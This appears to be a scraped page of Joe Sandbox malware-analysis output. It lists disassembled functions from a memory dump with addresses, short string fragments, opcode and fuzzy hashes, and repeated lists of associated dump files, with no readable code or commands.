Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: $$OK$P
API String ID: 0-279604475
Opcode ID: e61c8ee59e24f6c1dccf8e39da2af7f1bf75ec836d7f7962a5d0ffeb3b06934b
Instruction ID: b8bab0091773556be0d8f09fece81b7c370bf97fd056964a578a0e38e6d23af5
Opcode Fuzzy Hash: e61c8ee59e24f6c1dccf8e39da2af7f1bf75ec836d7f7962a5d0ffeb3b06934b
Instruction Fuzzy Hash: C5513B72A583914BD374CB38DC927EFB6D29BD6304F1DC97DC48DA7606EA3809058752

Function 000D0717 Relevance: 3.4, Strings: 2, Instructions: 854COMMON

Download Yara Rule

Strings

B:@<, xrefs: 000D0D02
F>?0, xrefs: 000D0D09

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: B:@<$F>?0
API String ID: 0-4011826714
Opcode ID: 53caee6b13a4a19d4cefd0354b40bf71abd7ae3f692b12d39bfff8950778be51
Instruction ID: 05e164cfa1377a9b5568b0bf1131d876d2f6a13bbafa08d6b93a8249e6be941d
Opcode Fuzzy Hash: 53caee6b13a4a19d4cefd0354b40bf71abd7ae3f692b12d39bfff8950778be51
Instruction Fuzzy Hash: 2C3224B1A007118BCB24CF28C89276BB7B1FF92310F29825DD8865F795E775A811CBE5

Function 000EA3F0 Relevance: 3.2, Strings: 2, Instructions: 711COMMON

Download Yara Rule

Strings

f, xrefs: 000EA671
cba`, xrefs: 000EA429

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: cba`$f
API String ID: 2994545307-1109690103
Opcode ID: da13d3eb62c5f5af6a0795e62cf314f2e09330b3e6b0e1803e4b94bc6aa16b72
Instruction ID: 2683cdd354f926cb350bcd9520f3ad5a47502e233a1b50ab8e42cb1fb636d649
Opcode Fuzzy Hash: da13d3eb62c5f5af6a0795e62cf314f2e09330b3e6b0e1803e4b94bc6aa16b72
Instruction Fuzzy Hash: 4A22F5716083819FD714CF29C98072FBBE2ABDA304F29852DE496A7792D770E905CB53

Function 00161581 Relevance: 3.1, Strings: 2, Instructions: 588COMMON

Download Yara Rule

Strings

.?-, xrefs: 00161B2D
z#_w, xrefs: 00161C7D

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: .?-$z#_w
API String ID: 0-3208239145
Opcode ID: 7fda2a19af0ecba13980d848582545b9da90f5c2920b8939dc088f932d187800
Instruction ID: 0e8f10ffd34c3961536b3e068ab2d5d0aca19e2d0b829c8071819d865cf140fd
Opcode Fuzzy Hash: 7fda2a19af0ecba13980d848582545b9da90f5c2920b8939dc088f932d187800
Instruction Fuzzy Hash: 2912DEF3E112204BF3544939CD58366B6939BD4324F2F82398E8CA7BC8D97E5D0A42C5

Function 001530FC Relevance: 3.0, Strings: 2, Instructions: 524COMMON

Download Yara Rule

Strings

9T+m, xrefs: 0015376C
y], xrefs: 001537A7

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: 9T+m$y]
API String ID: 0-2949623925
Opcode ID: a4abaa919af8145569346d5df123b8382fe61b2c748a1c485a0fb4c8e43989a2
Instruction ID: dc6007f005036733a20b578a2f8a401ad44abb62b5c6f24a6bbe5333c86fdd3d
Opcode Fuzzy Hash: a4abaa919af8145569346d5df123b8382fe61b2c748a1c485a0fb4c8e43989a2
Instruction Fuzzy Hash: 6502CCF3E156108BF3145A39DC943A6B6D6DBA4320F2F463C9F98973C4E97E9C068285

Function 000D2270 Relevance: 3.0, Strings: 2, Instructions: 501COMMON

Download Yara Rule

Strings

TU, xrefs: 000D2296
c!", xrefs: 000D242F

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: TU$c!"
API String ID: 0-3813282519
Opcode ID: 1ebe22b5436830e76cb572f6b1957152a14363fab4de8837ecae31c57f9820ed
Instruction ID: 730c68157947199d55c18d5fcb1fb2d92428809ffa6c1a9335750b88d4d208fb
Opcode Fuzzy Hash: 1ebe22b5436830e76cb572f6b1957152a14363fab4de8837ecae31c57f9820ed
Instruction Fuzzy Hash: E7C145726043009BD714DB29DC927BBB3E2EFE5314F19852EF986C7381E638E9058762

Function 0016651D Relevance: 3.0, Strings: 2, Instructions: 496COMMON

Download Yara Rule

Strings

'l0=, xrefs: 00166B72
'l0=, xrefs: 00166B2C

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: 'l0=$'l0=
API String ID: 0-1478339060
Opcode ID: 88fecd3d5fcb83c078c5412a0f02dc1c98a3501037abcd8671fd4b1e7023cf23
Instruction ID: 6d454f7d8bc0f8a4884505515ae684eda186783a272c5e6a3f593713c5546192
Opcode Fuzzy Hash: 88fecd3d5fcb83c078c5412a0f02dc1c98a3501037abcd8671fd4b1e7023cf23
Instruction Fuzzy Hash: 96F1DDF3E143208BF3145D28DD993A6B696EB94320F2B423D9F98AB7C0D97E9C0546C5

Function 000B4270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 000B42EB
IEND, xrefs: 000B4661

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 843e6aff5aa06234672477eb42d6d053cbdd56a093cbbaf1676cd2a724b8f782
Instruction ID: e9d26e31fd5aef2ffa6f26764072af0d760cee42336c8add3ff45214fbe4346b
Opcode Fuzzy Hash: 843e6aff5aa06234672477eb42d6d053cbdd56a093cbbaf1676cd2a724b8f782
Instruction Fuzzy Hash: E6D1C0B1908344AFD720DF18D8457DEBBE4EB94304F14892DF9999B382D775DA08CB92

Function 000B9070 Relevance: 2.8, Strings: 2, Instructions: 292COMMON

Download Yara Rule

Strings

(,"-, xrefs: 000B9134
&$(-, xrefs: 000B913C

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: &$(-$(,"-
API String ID: 0-2940422652
Opcode ID: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
Instruction ID: e235279aba5ac377e1e18738853fe718fd5980ef0364f6a971edaff1055bb318
Opcode Fuzzy Hash: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
Instruction Fuzzy Hash: 0071166110C3868EC7159F3994907BBFFE19FE3304F1849AEE4D59B282D7258A0AC766

Function 001535D8 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

9T+m, xrefs: 0015376C
y], xrefs: 001537A7

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: 9T+m$y]
API String ID: 0-2949623925
Opcode ID: 695cff8786db729236ef62a593cd73a44e9e8b073478632e16db185f9d57e503
Instruction ID: 527ae6861568c4a93c4e62943e63b1fccb731eb94103583b5dff6838af3ccb0a
Opcode Fuzzy Hash: 695cff8786db729236ef62a593cd73a44e9e8b073478632e16db185f9d57e503
Instruction Fuzzy Hash: F56101F3A086109FE314AA2DEC4176AB7D9DF94720F1B463DEBC8D7380E9795C018296

Function 000CD074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

pr, xrefs: 000CD112
|~, xrefs: 000CD10A

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: pr$|~
API String ID: 0-4145297803
Opcode ID: bd277d66712476ccda8c751e19b1e479cba53256c2ab525dbf0bbc2256fe4bed
Instruction ID: 724e72b2002d00d17fd377b036a0f95b30341320c47a073c185177f9b164ddfd
Opcode Fuzzy Hash: bd277d66712476ccda8c751e19b1e479cba53256c2ab525dbf0bbc2256fe4bed
Instruction Fuzzy Hash: B651F1B060C3509BD7009F24C8127AFB7F1EF91314F18856EE8848B361E73AD601D75A

Function 000CD087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

pr, xrefs: 000CD112
|~, xrefs: 000CD10A

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: pr$|~
API String ID: 0-4145297803
Opcode ID: 6c07b8d8f7b6f1dd453ce912bc3d7ca0c0081f942a1ccbb2e33601a5deaee6c1
Instruction ID: 75616398e6006f281248bcbcc54078f53082af12680ca64cb4ebb2e7b65894c1
Opcode Fuzzy Hash: 6c07b8d8f7b6f1dd453ce912bc3d7ca0c0081f942a1ccbb2e33601a5deaee6c1
Instruction Fuzzy Hash: 3851C1B060C3509BD7149F24C81277BB7F1EF91314F18856DE8855B3A1E73A9601D75A

Function 000E76B0 Relevance: 2.7, Strings: 2, Instructions: 196COMMON

Download Yara Rule

Strings

cba`, xrefs: 000E773A
c!", xrefs: 000E76B2

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: c!"$cba`
API String ID: 0-3815079656
Opcode ID: ee58bbdb723dbec1ea4ae0ecb5cba5a872bc031bdfe8b446acf104c3b414a2e6
Instruction ID: db94173080fd4531f93f444c8c55d40b7945b27ff69830edbae9268c0440c143
Opcode Fuzzy Hash: ee58bbdb723dbec1ea4ae0ecb5cba5a872bc031bdfe8b446acf104c3b414a2e6
Instruction Fuzzy Hash: 5E51137064C240AFE714DF26ED85B3B77E6EBD4304F15882CE1CAA7292D7759800DBA2

Function 000D536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

BLJB, xrefs: 000D5554
X, xrefs: 000D556A

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: BLJB$X
API String ID: 0-2222927247
Opcode ID: 2a6e3e53154a156fa70c4074ad54459eb6f29604a48bc25c0c584ad05940ea6e
Instruction ID: 0f866e7153c90e0be0c4542f534a4e893cc9521604ef372b1855a29ee75de78d
Opcode Fuzzy Hash: 2a6e3e53154a156fa70c4074ad54459eb6f29604a48bc25c0c584ad05940ea6e
Instruction Fuzzy Hash: DB518931608B418BD7308B6888512FBBBE1DF51352F584A7FDCD987382E234D544E362

Function 000D7653 Relevance: 2.6, Strings: 2, Instructions: 86COMMON

Download Yara Rule

Strings

ij, xrefs: 000D76D3
H.s , xrefs: 000D76E0

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

